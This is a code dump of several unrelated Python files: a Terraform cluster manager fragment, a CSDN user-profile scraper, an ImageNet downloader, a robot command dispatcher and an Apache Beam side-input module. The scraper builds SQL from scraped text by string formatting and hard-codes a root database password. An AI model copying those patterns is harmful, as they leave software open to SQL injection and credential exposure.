self.__get_cluster_path(TERRAFORM_PLAN_LOG_FILENAME), "w"
) as output_file:
environment_variables = environ.copy()
dns_manager = DnsManager(self.get_domain())
environment_variables.update(dns_manager.get_environment_variables())
environment_variables["OS_CLOUD"] = DEFAULT_CLOUD
try:
run(
[
"terraform",
"plan",
"-input=false",
"-no-color",
"-destroy=" + ("true" if destroy else "false"),
"-out="
+ self.__get_cluster_path(TERRAFORM_PLAN_BINARY_FILENAME),
],
cwd=self.__get_cluster_path(),
env=environment_variables,
stdout=output_file,
stderr=output_file,
check=True,
)
except CalledProcessError:
if destroy:
# Terraform returns an error if we try to destroy a cluster when the image
# it was created with does not exist anymore (e.g. CentOS-7-x64-2019-07). In these cases,
# not refreshing the terraform state (refresh=false) solves the issue.
try:
run(
[
"terraform",
"plan",
"-refresh=false",
"-input=false",
"-no-color",
"-destroy=" + ("true" if destroy else "false"),
"-out="
+ self.__get_cluster_path(
TERRAFORM_PLAN_BINARY_FILENAME
),
],
cwd=self.__get_cluster_path(),
env=environment_variables,
stdout=output_file,
stderr=output_file,
check=True,
)
except CalledProcessError:
# terraform plan fails even without refreshing the state
self.__update_status(previous_status)
raise PlanException(
"An error occurred while planning changes.",
additional_details=f"hostname: {self.get_hostname()}",
)
else:
self.__update_status(previous_status)
raise PlanException(
"An error occurred while planning changes.",
additional_details=f"hostname: {self.get_hostname()}",
)
with open(
self.__get_cluster_path(TERRAFORM_PLAN_JSON_FILENAME), "w"
) as output_file:
try:
run(
[
"terraform",
"show",
"-no-color",
"-json",
TERRAFORM_PLAN_BINARY_FILENAME,
],
cwd=self.__get_cluster_path(),
stdout=output_file,
check=True,
)
except CalledProcessError:
self.__update_status(previous_status)
raise PlanException(
"An error occurred while exporting planned changes.",
additional_details=f"hostname: {self.get_hostname()}",
)
self.__update_status(previous_status)
def apply(self):
if self.__not_found():
raise ClusterNotFoundException
if self.__is_busy():
raise BusyClusterException
if not self.__plan_created():
raise PlanNotCreatedException
self.__update_status(
ClusterStatusCode.BUILD_RUNNING
if self.get_plan_type() == PlanType.BUILD
else ClusterStatusCode.DESTROY_RUNNING
)
def terraform_apply(destroy: bool):
try:
self.__rotate_terraform_logs(apply=True)
with open(
self.__get_cluster_path(TERRAFORM_APPLY_LOG_FILENAME), "w"
) as output_file:
environment_variables = environ.copy()
dns_manager = DnsManager(self.get_domain())
environment_variables.update(
dns_manager.get_environment_variables()
)
environment_variables["OS_CLOUD"] = DEFAULT_CLOUD
if destroy:
environment_variables["TF_WARN_OUTPUT_ERRORS"] = "1"
run(
[
"terraform",
"apply",
"-input=false",
"-no-color",
"-auto-approve",
self.__get_cluster_path(TERRAFORM_PLAN_BINARY_FILENAME),
],
cwd=self.__get_cluster_path(),
stdout=output_file,
stderr=output_file,
check=True,
env=environment_variables,
)
with DatabaseManager.connect() as database_connection:
self.__database_connection = database_connection
if destroy:
# Removes the content of the cluster's folder, even if not empty
rmtree(self.__get_cluster_path(), ignore_errors=True)
self.__database_connection.execute(
"DELETE FROM magic_castles WHERE hostname = ?",
(self.get_hostname(),),
)
self.__database_connection.commit()
else:
self.__update_status(ClusterStatusCode.PROVISIONING_RUNNING)
if not destroy:
provisioning_manager = ProvisioningManager(self.get_hostname())
# Avoid multiple threads polling the same cluster
if not provisioning_manager.is_busy():
try:
provisioning_manager.poll_until_success()
status_code = ClusterStatusCode.PROVISIONING_SUCCESS
except PuppetTimeoutException:
status_code = ClusterStatusCode.PROVISIONING_ERROR
with DatabaseManager.connect() as database_connection:
self.__database_connection = database_connection
self.__update_status(status_code)
except CalledProcessError:
logging.info("An error occurred while running terraform apply.")
with DatabaseManager.connect() as database_connection:
self.__database_connection = database_connection
self.__update_status(
ClusterStatusCode.DESTROY_ERROR
if destroy
else ClusterStatusCode.BUILD_ERROR
)
finally:
with DatabaseManager.connect() as database_connection:
self.__database_connection = database_connection
self.__remove_existing_plan()
destroy = self.get_plan_type() == PlanType.DESTROY
terraform_apply_thread = Thread(target=terraform_apply, args=(destroy,))
terraform_apply_thread.start()
def __remove_existing_plan(self):
try:
self.__update_plan_type(PlanType.NONE)
# Remove existing plan, if it exists
remove(self.__get_cluster_path(TERRAFORM_PLAN_BINARY_FILENAME))
remove(self.__get_cluster_path(TERRAFORM_PLAN_JSON_FILENAME))
except FileNotFoundError:
# Must be a new cluster, without existing plans
pass
def __get_plan(self):
try:
with open(
self.__get_cluster_path(TERRAFORM_PLAN_JSON_FILENAME), "r"
) as plan_file:
plan_object = json.load(plan_file)
return plan_object
except (FileNotFoundError, json.decoder.JSONDecodeError):
return None
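# Illustrative-only sketch (not part of this module): the methods above are
# meant to be called plan-first, then apply. `cluster` stands in for an
# instance of the cluster class defined in this file; its constructor is not
# shown here, so this is a usage outline rather than the project's entry point.
def _example_build_cluster(cluster):
    cluster.plan_creation()  # writes main.tf.json, runs terraform init and terraform plan
    cluster.apply()          # starts the background terraform apply thread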
|
userspider.py
|
# -*- coding=utf-8 -*-
import threading
import time, requests, random, sys, codecs
import MySQLdb
import math
from bs4 import BeautifulSoup
# Proxy request helper
from utils.myutils import spider
# Execute a database update statement
def sql_opt(sql):
db = MySQLdb.connect("localhost", "root", "123456789", "db_csdn_user",
charset='utf8')
cursor = db.cursor()
try:
cursor.execute(sql)
db.commit()
except Exception as e:
print("----sql_opt数据库语句执行异常" + str(e))
db.rollback()
db.close()
# Database table sharding
def sjkfb(table):
db = MySQLdb.connect("localhost", "root", "123456789", "db_csdn_user",
charset='utf8')
cursor = db.cursor()
for index in range(1, 5):
table_name = table + "_" + str(index)
table_check_sql = "select COUNT(id) from " + table_name
cursor.execute(table_check_sql)
check_results = cursor.fetchall()
        if check_results[0][0] < 2000000:  # start a new shard every 2,000,000 rows
return table_name
db.close()
# Insert user information
def user_insert(username, insert_base, insert_blog, insert_relation, user_list):
db = MySQLdb.connect("localhost", "root", "123456789", "db_csdn_user",
charset='utf8')
cursor = db.cursor()
try:
print("---用户数据插入:" + username)
cursor.execute(insert_base)
cursor.execute(insert_blog)
cursor.execute(insert_relation)
db.commit()
except Exception as e:
print("---用户信息插入sql执行异常:" + username + str(e))
db.rollback()
user_sql = "select username from t_user_list"
cursor.execute(user_sql)
username_results = cursor.fetchall()
for row in username_results:
if row[0] in user_list:
user_list.remove(row[0])
for user in user_list:
insert_sql = "INSERT INTO `t_user_list` (`username`) VALUES ('%s')" % (user)
try:
print("--用户列表插入:" + user)
cursor.execute(insert_sql)
db.commit()
except Exception as e:
print("--用户列表插入sql执行异常:" + user + str(e))
db.rollback()
db.close()
# Parse the "me" profile page
def me_page_parse(username, times=0):
url = "https://me.csdn.net/blog/" + username
times += 1
if (times > 6):
error_sql = "UPDATE `t_user_list` SET `flag`='error' WHERE (`username`='%s')" % (username)
sql_opt(error_sql)
return
response = spider(url)
if response:
try:
web_html = response.text
soup = BeautifulSoup(web_html, 'lxml')
nickname = soup.select("p.lt_title")[0].get_text().replace("\n", "").replace(" ", "").replace("\'", "\\'")[
1:]
description = soup.select("p.description_detail")
if len(description) > 0:
description = description[0].get_text().replace("\n", "").replace(" ", "").replace("\'", "\\'")
else:
description = "无"
tab_item = soup.select("span.count ")
rank = str(soup.select("div.me_chanel_det > div.access > span")[1].get_text()) \
.replace("\n", "").replace(" ", "")
if len(tab_item) >= 6:
blog = tab_item[0].get_text().replace("\n", "").replace(" ", "")
download = tab_item[1].get_text().replace("\n", "").replace(" ", "")
bbs = tab_item[2].get_text().replace("\n", "").replace(" ", "")
blink = tab_item[3].get_text().replace("\n", "").replace(" ", "")
ask = tab_item[4].get_text().replace("\n", "").replace(" ", "")
myfavorite = tab_item[5].get_text().replace("\n", "").replace(" ", "")
fans = soup.select("div.fans > a > span")[0].get_text().replace("\n", "").replace(" ", "")
follow = soup.select("div.att > a > span")[0].get_text().replace("\n", "").replace(" ", "")
user_base_insert_sql = "INSERT INTO `" + sjkfb("t_user_base") + "` (`username`, `nickname`, `description`" \
", `download`, `bbs`, `blink`, `ask`,`myfavorite`) " \
"VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s','%s')" \
% (username, nickname, description, download, bbs, blink, ask, myfavorite)
user_blog_insert_sql = "INSERT INTO `" + sjkfb("t_user_blog") + "` (`username`, `blog`, `rank`) " \
"VALUES ('%s', '%s', '%s')" \
% (username, blog, rank)
user_relation_insert_sql = "INSERT INTO `" + sjkfb("t_user_relation") + "` (`username`, `fans`, `follow`) " \
"VALUES ('%s', '%s', '%s')" \
% (username, fans, follow)
new_user_list = ["csdnnews"]
if int(fans) > 0:
new_user_list.extend(fans_page_parse(username))
if int(follow) > 0:
new_user_list.extend(follow_page_parse(username))
new_user_list = list(set(new_user_list))
user_insert(username, user_base_insert_sql, user_blog_insert_sql, user_relation_insert_sql, new_user_list)
except Exception as e:
print("--用户信息解析处理失败异常:" + username + str(e))
error_sql = "UPDATE `t_user_list` SET `flag`='error' WHERE (`username`='%s')" % (username)
sql_opt(error_sql)
else:
me_page_parse(username, times)
# Parse the fans page
def fans_page_parse(username, times=0):
url = "https://me.csdn.net/fans/" + username
times += 1
if (times > 6):
error_sql = "UPDATE `t_user_list` SET `flag`='error' WHERE (`username`='%s')" % (username)
sql_opt(error_sql)
return
response = spider(url)
if response:
try:
web_html = response.text
soup = BeautifulSoup(web_html, "lxml")
fans_page_list = soup.select("p.user_name > a")
fans_list = []
if len(fans_page_list) > 0:
for fan in fans_page_list:
fansname = str(fan['href'])
fansname = fansname[fansname.rfind("/") + 1:]
fans_list.append(fansname)
return fans_list
except Exception as e:
print("---粉丝页面解析异常" + username + str(e))
else:
fans_page_parse(username, times)
# Parse the follow page
def follow_page_parse(username, times=0):
url = "https://me.csdn.net/follow/" + username
times += 1
if (times > 6):
error_sql = "UPDATE `t_user_list` SET `flag`='error' WHERE (`username`='%s')" % (username)
sql_opt(error_sql)
return
response = spider(url)
if response:
try:
web_html = response.text
soup = BeautifulSoup(web_html, "lxml")
follow_page_list = soup.select("p.user_name > a")
follow_list = []
if len(follow_page_list) > 0:
for fan in follow_page_list:
followname = str(fan['href'])
followname = followname[followname.rfind("/") + 1:]
follow_list.append(followname)
return follow_list
except Exception as e:
print("---关注页面解析异常" + username + str(e))
else:
follow_page_parse(username, times)
# Deprecated, no longer used
def cf_check():
db = MySQLdb.connect("localhost", "root", "123456789", "db_csdn_user",
charset='utf8')
cursor = db.cursor()
cf_check_sql = "SELECT COUNT(*) FROM(select id from t_user_list WHERE flag = '0' GROUP BY username HAVING COUNT(username) > 1) alias"
cd_handler = "DELETE FROM t_user_list WHERE id in (SELECT id FROM(select id from t_user_list WHERE flag = '0' GROUP BY username HAVING COUNT(username) > 1) alias)"
cursor.execute(cf_check_sql)
check_results = cursor.fetchall()
while check_results[0][0] != 0:
try:
cursor.execute(cd_handler)
db.commit()
except Exception as e:
print(str(e))
db.rollback()
cursor.execute(cf_check_sql)
check_results = cursor.fetchall()
db.close()
# User info crawler controller
def user_controleer():
# cf_check()
# print("重复检测结束")
db = MySQLdb.connect("localhost", "root", "123456789", "db_csdn_user",
charset='utf8')
cursor = db.cursor()
user_select_sql = "SELECT username FROM `t_user_list` WHERE flag = '0' limit 20"
user_update_sql = "UPDATE `t_user_list` SET `flag`='1' WHERE flag = '0' limit 20" # 每次从数据库中取完然后更新数据库
cursor.execute(user_select_sql)
username_results = cursor.fetchall()
try:
print("-用户提取更新", username_results)
cursor.execute(user_update_sql)
db.commit()
except Exception as e:
print("-用户提取更新sql执行异常:" + str(e))
db.rollback()
db.close()
threads = []
for row in username_results:
thread = threading.Thread(target=me_page_parse, args=[row[0]])
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
if __name__ == '__main__':
i = 0
while True:
start_time = time.time()
print("=====================================" + str(i) + "======================")
try:
user_controleer()
except Exception as e:
print(str(e))
time.sleep(60)
i += 1
print("=====================================" + str(time.time() - start_time) + "======================")
time.sleep(5)
|
dl-imgnet.py
|
#!/usr/bin/env python3
""" Helper script to download image-net.org image corresponding
to a given ID.
Author: Patrice FERLET <metal3d@gmail.com>
Licence: MIT
"""
import requests
import os
import hashlib
import imghdr
import io
import queue
import threading
import multiprocessing
import sys
CPUs = multiprocessing.cpu_count()
# LIST_URL =
# 'http://image-net.org/api/text/imagenet.synset.geturls?wnid={imid}'
LIST_URL = ''.join([
'http://www.image-net.org/',
'api/text/imagenet.synset.geturls.getmapping?wnid={imid}'])
SEE_URL = 'http://www.image-net.org/synset?wnid={id}'
# not wanted images, mainly for flickr bad file, hugedomain logos...
BADIMG = [
'880a7a58e05d3e83797f27573bb6d35c', # flickr
'596246739a83bb45e30e13437e0810d9', # warning sign
    '969e595182a947c7fdaaef4a34401760',  # forbidden sign
'af5db09e39ca35d8930b4e59962e09e5', # hugedomain logo
]
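# Helper sketch (not part of the original script): BADIMG holds md5 digests of
# unwanted placeholder images. A new digest can be computed from a locally
# saved copy of an offending file and appended to the list above.
def md5_of_file(path: str) -> str:
    """Return the hex md5 digest of a local file."""
    with open(path, 'rb') as f:
        return hashlib.md5(f.read()).hexdigest()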
TIMEOUT = 5
DEST = './'
DATAFILE = './data.csv'
q = None
locker = threading.Lock()
def init_queue(number: int = CPUs):
""" Initiate Queue to that number of elements """
global q
if q is None:
print("Initializing Queue to %d workers" % number)
q = queue.Queue(number)
else:
print('Queue already initialized')
def get_list(imid: str) -> requests.Response:
""" Return the requests.Response containing
the list of images for a given image-net.org
collection ID.
"""
imlist = requests.get(LIST_URL.format(imid=imid))
return imlist
def logthat(content, total=None, index=None):
""" Helper function to write logs
with progression status.
"""
if total is not None and index is not None:
print('%d/%d %s' % (index+1, total, content))
else:
print('%s' % content)
def save_data(imname: str, url: str, classname: str, nid: str):
locker.acquire()
if not os.path.exists(DATAFILE):
try:
# append header line
with open(DATAFILE, 'a') as f:
                f.write('Synset Name,Base URL,Classname,Imagenet ID\n')
except Exception as e:
print(e)
sys.exit(0)
try:
with open(DATAFILE, 'a') as f:
f.write('"%s",%s,"%s",%s\n' % (imname, url, classname, nid))
except Exception as e:
print(e)
finally:
locker.release()
def is_in_db(imname: str):
""" Fetch given url in CSV file and return boolean
saying if the file is already downloaded.
"""
locker.acquire()
try:
lines = open(DATAFILE).readlines()
except Exception:
return False
finally:
locker.release()
for l in lines:
if imname in l:
return True
return False
def dl_image(
imname: str,
imurl: str,
classname='unknown',
dest='./',
total=None,
index=None,
nid=None):
""" Download image from the given url, save it as classname
and check if the image is correct.
"""
# imname = os.path.basename(imurl)
# imname = imname.decode()
    # prepare the destination directory
os.makedirs(os.path.join(dest, classname), exist_ok=True)
# deactivate, use md5
# if os.path.exists(fileto):
    # print('File %s already downloaded, skipping' % fileto)
# return
# check if image is in csv database
if is_in_db(imname):
logthat('Image already downloaded, skipping', total, index)
return
# download image, and check status_code
try:
im = requests.get(imurl, timeout=TIMEOUT)
if im.status_code != 200:
logthat(
'Status code is not OK for %s, %d' % (
imurl, im.status_code),
total,
index
)
return
except Exception as e:
logthat(
            'Error, cannot download %s %s' % (imurl, e),
total,
index
)
return
# is it a valid image ?
b = io.BytesIO()
b.write(im.content)
b.seek(0)
ext = imghdr.what(b)
if ext is None:
logthat(
"%s seems to not be a valid image file, skipping" % imname,
total,
index
)
return
# is it a bad image ?
md5 = hashlib.md5(im.content).hexdigest()
if md5 in BADIMG:
logthat(
imname + ' md5 corresponds to a bad image, skipping',
total,
index)
return
fileto = os.path.join(dest, classname, imname + '.' + ext)
# md5 is ok, downloaded file is not empty, we can save it
with open(fileto, 'wb') as f:
f.write(im.content)
save_data(imname, imurl, classname, nid)
logthat("%s file saved" % imname, total, index)
def task_download():
""" Helper function that is launched by threading.Thread.
It reads Queue and call dl_image() in parallel.
"""
init_queue()
while True:
imname, item, classname, total, index, nid = q.get()
if item is None:
break
dl_image(imname, item, classname, DEST, total, index, nid)
q.task_done()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'nid',
        help='Id of the imagenet group to download. '
        'It can be a comma-separated list of ids. It\'s an optional '
        'argument; if left empty, a search is made on imagenet '
        'with the class name argument and nothing is downloaded.',
nargs='?'
)
parser.add_argument(
'name',
help='Real classname of the images to '
'download (it will create the corresponding directory name)'
)
parser.add_argument(
'-d',
'--dest',
help='destination root (without classname) directory '
'where images will be downloaded',
default=DEST
)
parser.add_argument(
'-t',
'--timeout',
type=int,
        help='Timeout in seconds for requests before abandoning the download',
default=TIMEOUT
)
parser.add_argument(
'-n',
'--num-worker',
type=int,
        help='Number of workers for parallel '
        'download; uses the number of CPUs by default',
default=CPUs
)
parser.add_argument(
'-c',
'--csv',
type=str,
        help='CSV file in which to keep downloaded file information',
default=DATAFILE
)
args = parser.parse_args()
nids = args.nid
classname = args.name
NUM_WORKERS = args.num_worker
TIMEOUT = args.timeout
DEST = args.dest
DATAFILE = args.csv
if args.nid is None:
# get words
nids = []
words = requests.get('http://image-net.org/archive/words.txt')
        print('You didn\'t provide an ID, choose one from the list')
for line in words.iter_lines():
nid, terms = line.decode().split('\t')
for n in classname.split(','):
if n in terms:
print(
nid,
terms,
"See results at: %s" % SEE_URL.format(id=nid)
)
sys.exit(0)
init_queue(NUM_WORKERS)
threads = []
for i in range(NUM_WORKERS):
t = threading.Thread(target=task_download)
t.start()
threads.append(t)
lines_count = 1
results = {}
for nid in nids.split(','):
nid = nid.strip()
res = get_list(nid)
        # the list is not very well formatted, so we iterate to count the
        # lines instead of splitting on "\n" or whatever the line
        # delimiter happens to be
for _ in res.iter_lines():
lines_count += 1
results[nid] = res
lastidx = 0
for nid, res in results.items():
for u in res.iter_lines():
u = u.decode().split(' ')
if len(u) == 2:
imname, u = list(u)
else:
continue
q.put((imname, u, classname, lines_count, lastidx, nid))
lastidx += 1
q.join()
for i in range(NUM_WORKERS):
q.put((None, None, None, None, None, None))
for t in threads:
t.join()
|
action_manager.py
|
import json
import logging
import threading
import time
from collections import deque
from typing import (Any, Callable, Deque, Dict, List, Tuple, cast)
from actions.commands.auto_refill import AutoRefillCommand
from actions.commands.get_gripsense import GetGripsenseCommand
from actions.commands.get_position import GetPositionCommand
from actions.commands.get_settings import GetSettingsCommand
from actions.commands.get_water_level import GetWaterLevelCommand
from actions.commands.home import HomeCommand
from actions.commands.move import MoveCommand
from actions.commands.pause import PauseCommand
from actions.commands.scan_rfid import ScanRFIDCommand
from actions.commands.set_magnet import SetMagnetCommand
from actions.commands.set_position import SetPositionCommand
from actions.commands.set_pumps import SetPumpsCommand
from actions.commands.set_settings import SetSettingsCommand
from actions.commands.side_camera import SideCam
from actions.commands.tare import TareCommand
from actions.commands.top_camera import TopCam
from actions.commands.water import WaterCommand
from actions.commands.weight import WeightCommand
from actions.errors.error_handler import ErrorHandler
from actions.feedback.feedback_manager import FeedbackManager
from actions.feedback.idle_handler import IdleHandler
from actions.memory import Memory
from common.Interval import Interval
from common.config import Config
from common.enums import State
from common.log_event import Logger
from common.mqtt_client import MQTT
from common.redis_client import Redis
from common.serial_manager import SerialManagerAbstract
from common.types import Command, Instruction, ErrorHandlerFactoryFunc
from util import Try
class ActionManager:
def __init__(self, serial: SerialManagerAbstract, mqtt: MQTT, redis: Redis, config: Config,
logger: Logger) -> None:
self._config: Config = config
self._logger: Logger = logger
self._serial: SerialManagerAbstract = serial
self._mqtt: MQTT = mqtt
self._redis: Redis = redis
self._memory: Memory = Memory()
self._feedback_manager: FeedbackManager = FeedbackManager(self._memory, mqtt, serial, redis, config, logger)
self._error_handler: ErrorHandler = ErrorHandler(self._memory, self._feedback_manager, self._serial, redis,
config, logger, self.cancel_all_actions)
self._debug_only: bool = config.debug_only_serialless
self._queue: Deque[Tuple[Instruction, Command]] = deque()
self._resolver: Dict[int,
Callable[[Instruction,
Command,
ErrorHandlerFactoryFunc,
FeedbackManager,
Memory,
Redis,
SerialManagerAbstract,
Config,
Logger,
bool,
bool],
bool]] = \
{
0: MoveCommand.run,
1: WeightCommand.run,
2: WaterCommand.run,
3: PauseCommand.run,
6: ScanRFIDCommand.run,
7: HomeCommand.run,
8: SetPositionCommand.run,
9: GetPositionCommand.run,
12: GetSettingsCommand.run,
13: SetSettingsCommand.run,
15: GetGripsenseCommand.run,
16: GetWaterLevelCommand.run,
17: SetMagnetCommand.run,
20: AutoRefillCommand.run,
21: SetPumpsCommand.run,
22: TareCommand.run,
100: TopCam.open,
101: TopCam.take_image,
102: TopCam.close,
105: SideCam.open,
106: SideCam.take_image,
107: SideCam.close,
255: self.cancel_all_actions
}
self._dependencies: List[Any] = [
self._feedback_manager,
self._memory,
self._redis,
self._serial,
self._config,
self._logger
]
state: State = self._redis.get_current_state()
logger.create_event(f'Startup fresh {self._config.robot_id}', robot_id=self._config.robot_id)
HomeCommand.run({}, {'val': [7, 1, 0, 0, 0, 0, 0, 80]}, self._error_handler.get_handler,
*self._dependencies, fatal=True)
HomeCommand.run({}, {'val': [7, 1, 0, 0, 0, 0, 0, 20]}, self._error_handler.get_handler,
*self._dependencies, fatal=True)
HomeCommand.run({}, {'val': [7, 0, 0, 0, 0, 1, 0, 20]}, self._error_handler.get_handler,
*self._dependencies, fatal=True)
HomeCommand.run({}, {'val': [7, 0, 0, 2, 0, 0, 0, 80]}, self._error_handler.get_handler,
*self._dependencies, fatal=True)
HomeCommand.run({}, {'val': [7, 0, 0, 2, 0, 0, 0, 20]}, self._error_handler.get_handler,
*self._dependencies, fatal=True)
logger.send_event(logging.INFO)
if State.has_state(state, State.HANDLING_INSTRUCTION):
if not self._redis.get_log_item_state(logger):
logger.create_event('Unknown', robot_id=self._config.robot_id)
instruction, command = self._redis.get_current_action()
details = {
'statusCode': 'HorizontalBotRebootError',
'message': 'Horizontal Robot rebooted while busy'
}
logger.log_system(logging.ERROR, details['message'])
logger.add_to_event(statusCode=details['statusCode'], error_message=details['message'])
logger.send_event(logging.ERROR)
self._feedback_manager.send_to_gateway(instruction, command, self._memory, details)
self._redis.set_state(State.IDLE)
TopCam.setup(self._mqtt, self._logger, self._config)
SideCam.setup(self._mqtt, self._logger, self._config)
threading.Thread(target=self.handle_action_queue, daemon=True).start()
def start_handling_instructions(self) -> None:
def handle_instruction(topic: str, payload: str, **kwargs: str) -> None:
self._redis.update_state(State.add_state, State.HANDLING_INSTRUCTION)
self._logger.log_system(logging.INFO, 'Received: ' + json.dumps(json.loads(payload), indent=4))
actions = json.loads(payload)
self._logger.create_event('start handling instruction', robot_id=self._config.robot_id,
id=actions['Instruction']['instructionId'], type=actions['Instruction']['type'])
for command in actions['Commands']:
command['val'] = cast(str, command['Str']).split(' ')
self.parse_and_handle_action(actions['Instruction'], command)
self._mqtt.subscribe(f'rc/{self._config.stage}/robots/{self._config.robot_id}/cmds', handle_instruction)
def parse_and_handle_action(self, instruction: Instruction, action: Command) -> None:
self._queue.appendleft((instruction, action))
# Todo: look over it again
def handle_action_queue(self) -> None:
self._logger.log_system(logging.INFO, 'Start handling action queue')
idle_handler = IdleHandler(self._mqtt, self._config.stage, self._config.farm_id, self._config.robot_id,
self._logger)
water_level_command = GetWaterLevelCommand(self._serial)
get_position_command = GetPositionCommand(self._serial)
interval = Interval(self._config.idle_time_sec, idle_handler.send_message,
lambda: (self._redis.get_current_action(), Try(water_level_command.get_water_level),
Try(get_position_command.get_position)))
while True:
if len(self._queue) == 0:
time.sleep(2)
continue
instruction, current_action = self._queue[-1]
self._redis.set_current_action(instruction, current_action)
self._queue.pop()
id = instruction.get('instructionId', 'No instruction id')
instruction_type = instruction.get('type', 'No instruction type')
self._logger.log_system(
logging.INFO, f'Current Action [{instruction_type}|{id}]:\n{json.dumps(current_action, indent=4)}')
current_action_type = int(current_action['val'][0])
if current_action_type not in self._resolver:
self._logger.log_system(logging.ERROR, f'ActionType {current_action_type} not implemented -> skip!')
continue
if current_action and self._resolver[current_action_type](instruction, current_action,
self._error_handler.get_handler,
*self._dependencies):
self._logger.log_system(logging.INFO, 'Ready for next Action')
else:
                self._logger.log_system(logging.ERROR, 'Error while executing command, deleting actions.')
if self._redis.get_current_state() != State.IDLE:
interval.reset()
def cancel_all_actions(self,
instruction: Instruction,
action: Command,
error_handler_factory: ErrorHandlerFactoryFunc,
feedback_manager: FeedbackManager,
memory: Memory,
redis: Redis,
serial: SerialManagerAbstract,
config: Config,
logger: Logger,
fatal: bool = False,
fatal_recovery: bool = False) -> bool:
self._queue.clear()
return True
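# Illustrative example (shape inferred from handle_instruction above, not an
# official message spec): a payload published on the `.../cmds` topic. The
# instruction id and type below are made up; each command's "Str" is split on
# spaces into `val`, and val[0] selects the handler in _resolver
# (e.g. 2 -> WaterCommand.run).
EXAMPLE_CMDS_PAYLOAD: Dict[str, Any] = {
    'Instruction': {'instructionId': 'example-id', 'type': 'example'},
    'Commands': [{'Str': '2 0 0 0 0 0 0 0'}],
}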
|
sideinputs.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Utilities for handling side inputs."""
# pytype: skip-file
from __future__ import absolute_import
import collections
import logging
import queue
import threading
import traceback
from builtins import object
from builtins import range
from apache_beam.coders import observable
from apache_beam.io import iobase
from apache_beam.runners.worker import opcounters
from apache_beam.transforms import window
# This module is experimental. No backwards-compatibility guarantees.
# Maximum number of reader threads for reading side input sources, per side
# input.
MAX_SOURCE_READER_THREADS = 15
# Number of slots for elements in side input element queue. Note that this
# value is intentionally smaller than MAX_SOURCE_READER_THREADS so as to reduce
# memory pressure of holding potentially-large elements in memory. Note that
# the number of pending elements in memory is equal to the sum of
# MAX_SOURCE_READER_THREADS and ELEMENT_QUEUE_SIZE.
ELEMENT_QUEUE_SIZE = 10
# Special element value sentinel for signaling reader state.
READER_THREAD_IS_DONE_SENTINEL = object()
# Used to efficiently window the values of non-windowed side inputs.
_globally_windowed = window.GlobalWindows.windowed_value(None).with_value
_LOGGER = logging.getLogger(__name__)
class PrefetchingSourceSetIterable(object):
"""Value iterator that reads concurrently from a set of sources."""
def __init__(self,
sources,
max_reader_threads=MAX_SOURCE_READER_THREADS,
read_counter=None):
self.sources = sources
self.num_reader_threads = min(max_reader_threads, len(self.sources))
# Queue for sources that are to be read.
self.sources_queue = queue.Queue()
for source in sources:
self.sources_queue.put(source)
# Queue for elements that have been read.
self.element_queue = queue.Queue(ELEMENT_QUEUE_SIZE)
# Queue for exceptions encountered in reader threads; to be rethrown.
self.reader_exceptions = queue.Queue()
# Whether we have already iterated; this iterable can only be used once.
self.already_iterated = False
# Whether an error was encountered in any source reader.
self.has_errored = False
self.read_counter = read_counter or opcounters.NoOpTransformIOCounter()
self.reader_threads = []
self._start_reader_threads()
def add_byte_counter(self, reader):
"""Adds byte counter observer to a side input reader.
Args:
reader: A reader that should inherit from ObservableMixin to have
bytes tracked.
"""
def update_bytes_read(record_size, is_record_size=False, **kwargs):
# Let the reader report block size.
if is_record_size:
self.read_counter.add_bytes_read(record_size)
if isinstance(reader, observable.ObservableMixin):
reader.register_observer(update_bytes_read)
def _start_reader_threads(self):
for _ in range(0, self.num_reader_threads):
t = threading.Thread(target=self._reader_thread)
t.daemon = True
t.start()
self.reader_threads.append(t)
def _reader_thread(self):
# pylint: disable=too-many-nested-blocks
try:
while True:
try:
source = self.sources_queue.get_nowait()
if isinstance(source, iobase.BoundedSource):
for value in source.read(source.get_range_tracker(None, None)):
if self.has_errored:
# If any reader has errored, just return.
return
if isinstance(value, window.WindowedValue):
self.element_queue.put(value)
else:
self.element_queue.put(_globally_windowed(value))
else:
# Native dataflow source.
with source.reader() as reader:
              # The tracking of time spent reading and bytes read from side
# inputs is kept behind an experiment flag to test performance
# impact.
self.add_byte_counter(reader)
returns_windowed_values = reader.returns_windowed_values
for value in reader:
if self.has_errored:
# If any reader has errored, just return.
return
if returns_windowed_values:
self.element_queue.put(value)
else:
self.element_queue.put(_globally_windowed(value))
except queue.Empty:
return
except Exception as e: # pylint: disable=broad-except
_LOGGER.error('Encountered exception in PrefetchingSourceSetIterable '
'reader thread: %s', traceback.format_exc())
self.reader_exceptions.put(e)
self.has_errored = True
finally:
self.element_queue.put(READER_THREAD_IS_DONE_SENTINEL)
def __iter__(self):
# pylint: disable=too-many-nested-blocks
if self.already_iterated:
raise RuntimeError(
'Can only iterate once over PrefetchingSourceSetIterable instance.')
self.already_iterated = True
# The invariants during execution are:
# 1) A worker thread always posts the sentinel as the last thing it does
# before exiting.
# 2) We always wait for all sentinels and then join all threads.
num_readers_finished = 0
try:
while True:
try:
with self.read_counter:
element = self.element_queue.get()
if element is READER_THREAD_IS_DONE_SENTINEL:
num_readers_finished += 1
if num_readers_finished == self.num_reader_threads:
return
else:
yield element
finally:
if self.has_errored:
raise self.reader_exceptions.get()
except GeneratorExit:
self.has_errored = True
raise
finally:
while num_readers_finished < self.num_reader_threads:
element = self.element_queue.get()
if element is READER_THREAD_IS_DONE_SENTINEL:
num_readers_finished += 1
for t in self.reader_threads:
t.join()
def get_iterator_fn_for_sources(sources,
max_reader_threads=MAX_SOURCE_READER_THREADS,
read_counter=None):
"""Returns callable that returns iterator over elements for given sources."""
def _inner():
return iter(
PrefetchingSourceSetIterable(
sources,
max_reader_threads=max_reader_threads,
read_counter=read_counter))
return _inner
class EmulatedIterable(collections.Iterable):
"""Emulates an iterable for a side input."""
def __init__(self, iterator_fn):
self.iterator_fn = iterator_fn
def __iter__(self):
